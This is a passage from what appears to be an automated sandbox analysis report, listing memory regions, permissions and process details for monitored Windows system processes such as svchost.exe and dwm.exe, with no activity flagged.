| pagefile_0x0000008226640000 | 0x8226640000 | 0x8226640fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000008226650000 | 0x8226650000 | 0x8226650fff | Private Memory | rw |
|
|
|
- |
| private_0x0000008226660000 | 0x8226660000 | 0x8226666fff | Private Memory | rw |
|
|
|
- |
| private_0x0000008226670000 | 0x8226670000 | 0x82266effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000082266f0000 | 0x82266f0000 | 0x82266f0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000008226700000 | 0x8226700000 | 0x82267fffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x8226800000 | 0x82268bdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000082268c0000 | 0x82268c0000 | 0x82269bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000082269c0000 | 0x82269c0000 | 0x8226a3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008226a40000 | 0x8226a40000 | 0x8226abffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008226ac0000 | 0x8226ac0000 | 0x8226ac0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000008226ad0000 | 0x8226ad0000 | 0x8226ad0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000008226ae0000 | 0x8226ae0000 | 0x8226ae0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000008226af0000 | 0x8226af0000 | 0x8226af6fff | Private Memory | rw |
|
|
|
- |
| private_0x0000008226b00000 | 0x8226b00000 | 0x8226bfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008226c00000 | 0x8226c00000 | 0x8226c7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008226c80000 | 0x8226c80000 | 0x8226cfffff | Private Memory | rw |
|
|
|
- |
| lsm.dll.mui | 0x8226d00000 | 0x8226d02fff | Memory Mapped File | r |
|
|
|
- |
| svchost.exe.mui | 0x8226d10000 | 0x8226d10fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000008226d20000 | 0x8226d20000 | 0x8226d20fff | Private Memory | rw |
|
|
|
- |
| private_0x0000008226d30000 | 0x8226d30000 | 0x8226d30fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000008226d40000 | 0x8226d40000 | 0x8226d40fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000008226d50000 | 0x8226d50000 | 0x8226d50fff | Pagefile Backed Memory | r |
|
|
|
- |
| combase.dll.mui | 0x8226d60000 | 0x8226d69fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000008226d70000 | 0x8226d70000 | 0x8226d76fff | Private Memory | rw |
|
|
|
- |
| private_0x0000008226d80000 | 0x8226d80000 | 0x8226dfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008226e00000 | 0x8226e00000 | 0x8226efffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008226f00000 | 0x8226f00000 | 0x8226ffffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008227000000 | 0x8227000000 | 0x82270fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008227100000 | 0x8227100000 | 0x82271fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008227200000 | 0x8227200000 | 0x82272fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008227300000 | 0x8227300000 | 0x82273fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008227400000 | 0x8227400000 | 0x82274fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008227520000 | 0x8227520000 | 0x8227526fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000008227530000 | 0x8227530000 | 0x82275effff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000008227600000 | 0x8227600000 | 0x82276fffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x8227700000 | 0x8227a36fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000008227a40000 | 0x8227a40000 | 0x8227b3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008227b40000 | 0x8227b40000 | 0x8227bbffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000008227bc0000 | 0x8227bc0000 | 0x8227be9fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000008227c00000 | 0x8227c00000 | 0x8227cfffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000008227d00000 | 0x8227d00000 | 0x8227e87fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000008227e90000 | 0x8227e90000 | 0x8228010fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000008228020000 | 0x8228020000 | 0x822811ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008228120000 | 0x8228120000 | 0x822821ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008228220000 | 0x8228220000 | 0x822831ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008228320000 | 0x8228320000 | 0x822839ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000082283a0000 | 0x82283a0000 | 0x822841ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000008228420000 | 0x8228420000 | 0x822849ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000082284a0000 | 0x82284a0000 | 0x822851ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ffe00000 | 0x7df5ffe00000 | 0x7ff5ffdfffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff67319e000 | 0x7ff67319e000 | 0x7ff67319ffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6731a0000 | 0x7ff6731a0000 | 0x7ff6731a1fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6731a2000 | 0x7ff6731a2000 | 0x7ff6731a3fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6731a4000 | 0x7ff6731a4000 | 0x7ff6731a5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6731a6000 | 0x7ff6731a6000 | 0x7ff6731a7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6731a8000 | 0x7ff6731a8000 | 0x7ff6731a9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6731aa000 | 0x7ff6731aa000 | 0x7ff6731abfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6731ac000 | 0x7ff6731ac000 | 0x7ff6731adfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6731ae000 | 0x7ff6731ae000 | 0x7ff6731affff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6731b0000 | 0x7ff6731b0000 | 0x7ff6731b1fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6731b2000 | 0x7ff6731b2000 | 0x7ff6731b3fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6731b4000 | 0x7ff6731b4000 | 0x7ff6731b5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6731b6000 | 0x7ff6731b6000 | 0x7ff6731b7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6731b8000 | 0x7ff6731b8000 | 0x7ff6731b9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6731ba000 | 0x7ff6731ba000 | 0x7ff6731bbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6731bc000 | 0x7ff6731bc000 | 0x7ff6731bdfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6731be000 | 0x7ff6731be000 | 0x7ff6731bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff6731c0000 | 0x7ff6731c0000 | 0x7ff6732bffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff6732c0000 | 0x7ff6732c0000 | 0x7ff6732e2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff6732e3000 | 0x7ff6732e3000 | 0x7ff6732e4fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6732e5000 | 0x7ff6732e5000 | 0x7ff6732e5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6732e6000 | 0x7ff6732e6000 | 0x7ff6732e7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6732e8000 | 0x7ff6732e8000 | 0x7ff6732e9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6732ea000 | 0x7ff6732ea000 | 0x7ff6732ebfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6732ec000 | 0x7ff6732ec000 | 0x7ff6732edfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6732ee000 | 0x7ff6732ee000 | 0x7ff6732effff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0x7ff673b40000 | 0x7ff673b4cfff | Memory Mapped File | rwx |
|
|
|
- |
| capauthz.dll | 0x7ff8dee80000 | 0x7ff8dee95fff | Memory Mapped File | rwx |
|
|
|
- |
| licensemanagerapi.dll | 0x7ff8deea0000 | 0x7ff8deeabfff | Memory Mapped File | rwx |
|
|
|
- |
| execmodelproxy.dll | 0x7ff8df190000 | 0x7ff8df1a4fff | Memory Mapped File | rwx |
|
|
|
- |
| sebbackgroundmanagerpolicy.dll | 0x7ff8df1b0000 | 0x7ff8df1bdfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.networking.backgroundtransfer.backgroundmanagerpolicy.dll | 0x7ff8df1c0000 | 0x7ff8df1d7fff | Memory Mapped File | rwx |
|
|
|
- |
| acpbackgroundmanagerpolicy.dll | 0x7ff8df1e0000 | 0x7ff8df1f6fff | Memory Mapped File | rwx |
|
|
|
- |
| cbtbackgroundmanagerpolicy.dll | 0x7ff8df200000 | 0x7ff8df20bfff | Memory Mapped File | rwx |
|
|
|
- |
| backgroundmediapolicy.dll | 0x7ff8df210000 | 0x7ff8df21ffff | Memory Mapped File | rwx |
|
|
|
- |
| execmodelclient.dll | 0x7ff8df3b0000 | 0x7ff8df3f2fff | Memory Mapped File | rwx |
|
|
|
- |
| actxprxy.dll | 0x7ff8df640000 | 0x7ff8dfaa9fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp110_win.dll | 0x7ff8e60a0000 | 0x7ff8e6131fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ff8e79b0000 | 0x7ff8e7b32fff | Memory Mapped File | rwx |
|
|
|
- |
| mmdevapi.dll | 0x7ff8e7b40000 | 0x7ff8e7bb1fff | Memory Mapped File | rwx |
|
|
|
- |
| usermgrcli.dll | 0x7ff8e7d10000 | 0x7ff8e7d1ffff | Memory Mapped File | rwx |
|
|
|
- |
| bi.dll | 0x7ff8e8040000 | 0x7ff8e804bfff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x7ff8e8ad0000 | 0x7ff8e8ae2fff | Memory Mapped File | rwx |
|
|
|
- |
| coremessaging.dll | 0x7ff8e9060000 | 0x7ff8e9127fff | Memory Mapped File | rwx |
|
|
|
- |
| dab.dll | 0x7ff8e9580000 | 0x7ff8e95a0fff | Memory Mapped File | rwx |
|
|
|
- |
| brokerlib.dll | 0x7ff8e95b0000 | 0x7ff8e95eefff | Memory Mapped File | rwx |
|
|
|
- |
| systemeventsbrokerserver.dll | 0x7ff8e95f0000 | 0x7ff8e9651fff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7ff8e9720000 | 0x7ff8e9746fff | Memory Mapped File | rwx |
|
|
|
- |
| wmsgapi.dll | 0x7ff8e9770000 | 0x7ff8e9778fff | Memory Mapped File | rwx |
|
|
|
- |
| sysntfy.dll | 0x7ff8e9780000 | 0x7ff8e978bfff | Memory Mapped File | rwx |
|
|
|
- |
| lsm.dll | 0x7ff8e9790000 | 0x7ff8e9850fff | Memory Mapped File | rwx |
|
|
|
- |
| twinapi.appcore.dll | 0x7ff8e9860000 | 0x7ff8e994dfff | Memory Mapped File | rwx |
|
|
|
- |
| psmserviceexthost.dll | 0x7ff8e9950000 | 0x7ff8e99d3fff | Memory Mapped File | rwx |
|
|
|
- |
| rmclient.dll | 0x7ff8e99e0000 | 0x7ff8e9a07fff | Memory Mapped File | rwx |
|
|
|
- |
| psmsrv.dll | 0x7ff8e9a10000 | 0x7ff8e9a41fff | Memory Mapped File | rwx |
|
|
|
- |
| bisrv.dll | 0x7ff8e9a50000 | 0x7ff8e9ad5fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcss.dll | 0x7ff8e9bf0000 | 0x7ff8e9ccafff | Memory Mapped File | rwx |
|
|
|
- |
| gpapi.dll | 0x7ff8e9cd0000 | 0x7ff8e9cf2fff | Memory Mapped File | rwx |
|
|
|
- |
| tdh.dll | 0x7ff8e9d00000 | 0x7ff8e9df7fff | Memory Mapped File | rwx |
|
|
|
- |
| hid.dll | 0x7ff8e9e00000 | 0x7ff8e9e0bfff | Memory Mapped File | rwx |
|
|
|
- |
| umpoext.dll | 0x7ff8e9e10000 | 0x7ff8e9e25fff | Memory Mapped File | rwx |
|
|
|
- |
| umpo.dll | 0x7ff8e9e30000 | 0x7ff8e9e4afff | Memory Mapped File | rwx |
|
|
|
- |
| umpnpmgr.dll | 0x7ff8e9e50000 | 0x7ff8e9e6ffff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ff8ea270000 | 0x7ff8ea2a2fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7ff8ea360000 | 0x7ff8ea37efff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ff8ea620000 | 0x7ff8ea636fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ff8ea790000 | 0x7ff8ea79afff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x7ff8ea820000 | 0x7ff8ea877fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ff8ea9d0000 | 0x7ff8ea9fbfff | Memory Mapped File | rwx |
|
|
|
- |
| eventaggregation.dll | 0x7ff8eaba0000 | 0x7ff8eabb9fff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ff8eabd0000 | 0x7ff8eabf7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ff8eac00000 | 0x7ff8eac6afff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ff8eadd0000 | 0x7ff8eae19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ff8eae20000 | 0x7ff8eae2efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ff8eae30000 | 0x7ff8eae42fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ff8eaf60000 | 0x7ff8eafa3fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ff8eb870000 | 0x7ff8eba4cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ff8ebb30000 | 0x7ff8ebbedfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ff8ebdc0000 | 0x7ff8ebf0dfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ff8ec240000 | 0x7ff8ec29afff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7ff8ec300000 | 0x7ff8ec440fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ff8ec450000 | 0x7ff8ec575fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ff8edb10000 | 0x7ff8edbb4fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ff8edbc0000 | 0x7ff8edd44fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ff8edd60000 | 0x7ff8edfdbfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ff8ee0b0000 | 0x7ff8ee14cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ff8ee190000 | 0x7ff8ee235fff | Memory Mapped File | rwx |
|
|
|
- |
| coml2.dll | 0x7ff8ee260000 | 0x7ff8ee2cefff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ff8ee2d0000 | 0x7ff8ee37cfff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 4 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #64: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #64 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k RPCSS |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x268 |
| Parent PID | 0x1e8 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Network Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D84
0x
5C0
0x
278
0x
934
0x
8AC
0x
694
0x
3E0
0x
31C
0x
310
0x
2A4
0x
29C
0x
290
0x
28C
0x
284
0x
26C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x0000007976fb0000 | 0x7976fb0000 | 0x7976fbffff | Pagefile Backed Memory | rw |
|
|
|
- |
| mswsock.dll.mui | 0x7976fc0000 | 0x7976fc2fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000007976fd0000 | 0x7976fd0000 | 0x7976fe3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000007976ff0000 | 0x7976ff0000 | 0x797706ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000007977070000 | 0x7977070000 | 0x7977073fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000007977080000 | 0x7977080000 | 0x7977080fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000007977090000 | 0x7977090000 | 0x7977091fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x79770a0000 | 0x797715dfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000007977160000 | 0x7977160000 | 0x7977160fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000007977170000 | 0x7977170000 | 0x7977176fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000007977180000 | 0x7977180000 | 0x7977180fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000079771a0000 | 0x79771a0000 | 0x79771a6fff | Private Memory | rw |
|
|
|
- |
| private_0x0000007977200000 | 0x7977200000 | 0x79772fffff | Private Memory | rw |
|
|
|
- |
| wmiprvse.exe | 0x7977300000 | 0x797737afff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000007977380000 | 0x7977380000 | 0x79773fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000007977480000 | 0x7977480000 | 0x797757ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000007977600000 | 0x7977600000 | 0x79776fffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x7977700000 | 0x7977a36fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000007977a40000 | 0x7977a40000 | 0x7977b3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000007977b40000 | 0x7977b40000 | 0x7977c3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000007977c40000 | 0x7977c40000 | 0x7977d3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000007977d40000 | 0x7977d40000 | 0x7977e3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000007977e40000 | 0x7977e40000 | 0x7977f3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000007977f40000 | 0x7977f40000 | 0x797803ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000007978040000 | 0x7978040000 | 0x797813ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000007978200000 | 0x7978200000 | 0x79782fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000007978300000 | 0x7978300000 | 0x79783fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000007978400000 | 0x7978400000 | 0x79784fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000007978500000 | 0x7978500000 | 0x79785fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000007978600000 | 0x7978600000 | 0x79786fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000007978700000 | 0x7978700000 | 0x79787fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff270000 | 0x7df5ff270000 | 0x7ff5ff26ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff672d0c000 | 0x7ff672d0c000 | 0x7ff672d0dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff672d0e000 | 0x7ff672d0e000 | 0x7ff672d0ffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff672d10000 | 0x7ff672d10000 | 0x7ff672d11fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff672d12000 | 0x7ff672d12000 | 0x7ff672d13fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff672d14000 | 0x7ff672d14000 | 0x7ff672d15fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff672d16000 | 0x7ff672d16000 | 0x7ff672d17fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff672d18000 | 0x7ff672d18000 | 0x7ff672d19fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff672d1a000 | 0x7ff672d1a000 | 0x7ff672d1bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff672d1c000 | 0x7ff672d1c000 | 0x7ff672d1dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff672d1e000 | 0x7ff672d1e000 | 0x7ff672d1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff672d20000 | 0x7ff672d20000 | 0x7ff672e1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff672e20000 | 0x7ff672e20000 | 0x7ff672e42fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff672e44000 | 0x7ff672e44000 | 0x7ff672e45fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff672e46000 | 0x7ff672e46000 | 0x7ff672e47fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff672e48000 | 0x7ff672e48000 | 0x7ff672e49fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff672e4a000 | 0x7ff672e4a000 | 0x7ff672e4afff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff672e4c000 | 0x7ff672e4c000 | 0x7ff672e4dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff672e4e000 | 0x7ff672e4e000 | 0x7ff672e4ffff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0x7ff673b40000 | 0x7ff673b4cfff | Memory Mapped File | rwx |
|
|
|
- |
| capauthz.dll | 0x7ff8dee80000 | 0x7ff8dee95fff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x7ff8e7160000 | 0x7ff8e71c7fff | Memory Mapped File | rwx |
|
|
|
- |
| usermgrcli.dll | 0x7ff8e7d10000 | 0x7ff8e7d1ffff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x7ff8e8ad0000 | 0x7ff8e8ae2fff | Memory Mapped File | rwx |
|
|
|
- |
| fwbase.dll | 0x7ff8e9ae0000 | 0x7ff8e9b11fff | Memory Mapped File | rwx |
|
|
|
- |
| firewallapi.dll | 0x7ff8e9b20000 | 0x7ff8e9ba1fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x7ff8e9bb0000 | 0x7ff8e9bc2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcepmap.dll | 0x7ff8e9bd0000 | 0x7ff8e9be6fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcss.dll | 0x7ff8e9bf0000 | 0x7ff8e9ccafff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ff8ea270000 | 0x7ff8ea2a2fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x7ff8ea5c0000 | 0x7ff8ea61cfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ff8ea620000 | 0x7ff8ea636fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ff8ea790000 | 0x7ff8ea79afff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x7ff8ea820000 | 0x7ff8ea877fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ff8ea9d0000 | 0x7ff8ea9fbfff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ff8eabd0000 | 0x7ff8eabf7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ff8eac00000 | 0x7ff8eac6afff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ff8eadd0000 | 0x7ff8eae19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ff8eae20000 | 0x7ff8eae2efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ff8eb870000 | 0x7ff8eba4cfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ff8ec240000 | 0x7ff8ec29afff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ff8ec450000 | 0x7ff8ec575fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ff8edb10000 | 0x7ff8edbb4fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ff8edd60000 | 0x7ff8edfdbfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7ff8ee040000 | 0x7ff8ee0a8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ff8ee0b0000 | 0x7ff8ee14cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ff8ee190000 | 0x7ff8ee235fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7ff8ee250000 | 0x7ff8ee257fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ff8ee2d0000 | 0x7ff8ee37cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
Process #65: dwm.exe
0
0
| Information | Value |
|---|---|
| ID | #65 |
| File Name | c:\windows\system32\dwm.exe |
| Command Line | "dwm.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:27 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x2c8 |
| Parent PID | 0x1d0 (c:\windows\system32\winlogon.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | Window Manager\DWM-1 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege |
| Thread IDs |
0x
81C
0x
524
0x
520
0x
51C
0x
314
0x
308
0x
30C
0x
2F0
0x
2E8
0x
2CC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x0000000100000000 | 0x100000000 | 0x10000ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000100010000 | 0x100010000 | 0x100016fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000100020000 | 0x100020000 | 0x100033fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000100040000 | 0x100040000 | 0x1000bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000001000c0000 | 0x1000c0000 | 0x1000c3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000001000d0000 | 0x1000d0000 | 0x1000d2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000001000e0000 | 0x1000e0000 | 0x1000e1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000001000f0000 | 0x1000f0000 | 0x1000f6fff | Private Memory | rw |
|
|
|
- |
| dwm.exe.mui | 0x100100000 | 0x100101fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000100110000 | 0x100110000 | 0x100110fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000100120000 | 0x100120000 | 0x10021ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x100220000 | 0x1002ddfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000001002e0000 | 0x1002e0000 | 0x1002e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000001002f0000 | 0x1002f0000 | 0x1002f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000100300000 | 0x100300000 | 0x10030ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000100310000 | 0x100310000 | 0x10031ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000100320000 | 0x100320000 | 0x10035ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000100360000 | 0x100360000 | 0x100360fff | Private Memory | rw |
|
|
|
- |
